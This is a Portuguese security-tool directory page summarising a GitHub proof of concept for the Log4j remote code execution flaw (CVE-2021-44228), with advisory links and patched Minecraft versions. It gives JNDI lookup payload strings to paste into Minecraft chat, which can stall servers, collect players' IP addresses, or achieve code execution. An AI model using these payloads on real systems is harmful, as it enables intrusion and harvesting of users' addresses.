Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4J-RCE-Proof-Of-Concept — Log4j-RCE (CVE-2021-44228) Prova de Conceito com informações adicionais | Kitploit
Ferramentas/GitHubGitHub/hycrafthd/log4j-rce-proof-of-concept
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubhycrafthd/log4j-rce-proof-of-concept

Log4J-RCE-Proof-Of-Concept

Log4j-RCE (CVE-2021-44228) Prova de Conceito com informações adicionais

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite
18231há 4 anosRevisado pelo Kitploit

Prova de Conceito de RCE no Log4J (CVE-2021-44228)

Esta é uma prova de conceito da RCE do log4j.

Aqui estão alguns links para o CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Este bug afeta quase todas as versões do log4j2 e talvez do log4j1. A versão recomendada para uso é 2.15.0 que corrige a exploração.

Demonstração com minecraft (que usa log4j2)

  • Detalhes sobre o impacto no minecraft estão listados aqui: https://twitter.com/slicedlime/status/1469150993527017483
  • Artigo do minecraft está aqui: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Versões corrigidas do minecraft forge: https://twitter.com/gigaherz/status/1469331288368861195
  • Artigo detalhado do minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Versões corrigidas do minecraft fabric: https://twitter.com/slicedlime/status/1469192689904193537
  • Versões corrigidas do minecraft paper: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Versões corrigidas do minecraft spigot: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Versões corrigidas do minecraft sponge: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag ou envio de dados serializados

  • Cole ${jndi:ldap://127.0.0.1/e} no chat. Se houver um socket aberto na porta 389 o logj4 tenta conectar e bloqueia a comunicação adicional até que ocorra um timeout.
  • Ao usar esta exploração de prova de conceito, o log no console registrará THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! que é um objeto de string serializado do servidor ldap.

image

  • Além disso, o servidor ldap malicioso recebe todos os endereços IP onde a mensagem é registrada. Isso significa que os endereços IP dos jogadores em um servidor podem ser coletados com esta exploração.

RCE

  • Cole ${jndi:ldap://127.0.0.1/exe} no chat. Se -Dcom.sun.jndi.ldap.object.trustURLCodebase=true estiver definido como true, a execução remota de código ocorrerá.

image

  • Felizmente, JDKs modernos desabilitam o carregamento remoto de classes por padrão. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Versões antigas ainda podem permitir isso!!

Aviso Legal

Este projeto é apenas para fins educacionais.

Baixar ferramenta